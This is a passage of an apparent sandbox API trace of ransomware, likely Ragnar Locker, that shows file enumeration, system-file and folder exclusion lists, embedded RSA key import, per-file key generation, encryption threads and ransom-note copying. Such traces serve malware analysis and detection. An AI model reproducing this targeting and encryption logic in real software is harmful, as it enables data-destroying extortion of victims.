out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.625] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0176.625] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0176.626] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0176.626] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0176.626] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.626] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0176.626] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned=".rtf" [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0176.626] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0176.626] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0176.626] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0176.626] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0176.626] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0176.627] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0176.627] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0176.627] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0176.627] GetProcessHeap () returned 0x3520000 [0176.627] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0176.628] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" [0176.628] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0176.628] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.628] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0176.628] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned=".xml" [0176.628] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.628] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0176.628] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0176.628] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0176.629] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0176.629] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0176.629] GetProcessHeap () returned 0x3520000 [0176.629] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0176.630] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0176.630] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0176.630] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.630] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0176.630] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned=".dll" [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0176.631] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0176.631] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0176.631] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0176.631] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0176.631] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0176.631] GetProcessHeap () returned 0x3520000 [0176.631] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586a60 [0176.631] CryptAcquireContextW (in: phProv=0x3586a60, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586a60*=0x5d26a70) returned 1 [0176.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0176.632] GetProcessHeap () returned 0x3520000 [0176.632] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358ee28 [0176.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358ee28, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0176.632] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0176.633] GetProcessHeap () returned 0x3520000 [0176.633] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0176.633] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0176.633] GetProcessHeap () returned 0x3520000 [0176.633] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358ee28 | out: hHeap=0x3520000) returned 1 [0176.633] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0176.633] CryptImportPublicKeyInfo (in: hCryptProv=0x5d26a70, dwCertEncodingType=0x1, pInfo=0x35c9eb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x35c9ee8*, PublicKey.cbData=0x10e, PublicKey.pbData=0x35c9ef0*, PublicKey.cUnusedBits=0x0), phKey=0x3586a64 | out: phKey=0x3586a64*=0x3547fc0) returned 1 [0176.633] GetProcessHeap () returned 0x3520000 [0176.633] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0176.633] LocalFree (hMem=0x35c9eb8) returned 0x0 [0176.633] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d268d8) returned 1 [0176.634] CryptGenRandom (in: hProv=0x5d268d8, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0176.634] CryptReleaseContext (hProv=0x5d268d8, dwFlags=0x0) returned 1 [0176.634] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0176.637] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26630) returned 1 [0176.637] CryptGenRandom (in: hProv=0x5d26630, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0176.637] CryptReleaseContext (hProv=0x5d26630, dwFlags=0x0) returned 1 [0176.637] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0176.640] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26af8) returned 1 [0176.641] CryptGenRandom (in: hProv=0x5d26af8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0176.641] CryptReleaseContext (hProv=0x5d26af8, dwFlags=0x0) returned 1 [0176.641] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0176.682] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26fc0) returned 1 [0176.683] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0176.683] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0176.683] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0176.685] CryptEncrypt (in: hKey=0x3547fc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.686] GetLastError () returned 0x80090016 [0176.686] CryptEncrypt (in: hKey=0x3547fc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.687] GetLastError () returned 0x80090016 [0176.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xfb0) returned 0x3f0 [0176.687] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d266b8) returned 1 [0176.688] CryptGenRandom (in: hProv=0x5d266b8, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0176.688] CryptReleaseContext (hProv=0x5d266b8, dwFlags=0x0) returned 1 [0176.688] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0176.691] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26da0) returned 1 [0176.691] CryptGenRandom (in: hProv=0x5d26da0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0176.691] CryptReleaseContext (hProv=0x5d26da0, dwFlags=0x0) returned 1 [0176.691] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0176.694] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26300) returned 1 [0176.694] CryptGenRandom (in: hProv=0x5d26300, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0176.694] CryptReleaseContext (hProv=0x5d26300, dwFlags=0x0) returned 1 [0176.694] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0176.697] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26e28) returned 1 [0176.697] CryptGenRandom (in: hProv=0x5d26e28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0176.697] CryptReleaseContext (hProv=0x5d26e28, dwFlags=0x0) returned 1 [0176.697] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0176.700] CryptEncrypt (in: hKey=0x3547fc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.700] GetLastError () returned 0x80090016 [0176.700] CryptEncrypt (in: hKey=0x3547fc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.700] GetLastError () returned 0x80090016 [0176.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x123c) returned 0x3b4 [0176.701] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0176.832] GetProcessHeap () returned 0x3520000 [0176.832] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586a60 | out: hHeap=0x3520000) returned 1 [0176.832] CloseHandle (hObject=0x3f0) returned 1 [0176.832] GetProcessHeap () returned 0x3520000 [0176.833] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0176.834] CloseHandle (hObject=0x3b4) returned 1 [0176.834] GetProcessHeap () returned 0x3520000 [0176.834] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0176.834] FindClose (in: hFindFile=0x3547ac0 | out: hFindFile=0x3547ac0) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0176.836] lstrcmpiW (lpString1="2052", lpString2=".") returned 1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="..") returned 1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Windows") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Windows.old") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Tor browser") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Internet Explorer") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Google") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Opera") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Opera Software") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Mozilla") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="Mozilla Firefox") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="$Recycle.Bin") returned 1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="ProgramData") returned -1 [0176.836] lstrcmpiW (lpString1="2052", lpString2="All Users") returned -1 [0176.836] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0176.836] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="2052" | out: lpString1="2052") returned="2052" [0176.836] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\" [0176.836] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2052\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\" [0176.836] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\!$R4GN4R_B8CF767A$!.txt" [0176.837] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\2052\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0176.843] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*" [0176.844] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.844] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0176.844] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0176.844] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547b80 [0176.844] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0176.844] FindNextFileW (in: hFindFile=0x3547b80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf6be0447, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.846] 